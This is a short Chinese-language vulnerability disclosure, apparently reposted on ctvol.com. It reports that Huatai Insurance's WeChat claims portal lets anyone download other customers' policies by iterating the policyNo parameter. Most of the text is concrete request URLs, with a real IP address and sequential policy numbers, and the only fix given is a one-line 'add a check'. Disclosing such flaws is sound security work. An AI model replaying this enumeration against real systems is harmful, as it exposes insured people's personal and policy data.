华泰保险某系统设计不当导致用户保单等详细信息泄漏
系统设计不当
华泰微信自助理赔
地址:https://202.108.103.169/htweixin/
在一处保单下载位置,可遍历用户保单信息
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001577
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001576
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001578
通过遍历policyNo即可
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215002568
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=WB251646043215001565
上面的是境外的保单,下面是境内保单的命名规则
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=A0011668120000000132
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=A0011668120000000131
https://202.108.103.169/htweixin/InsuranceDownload.action?policyNo=A0011668120000000127
解决方案:
加判断
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/99772.html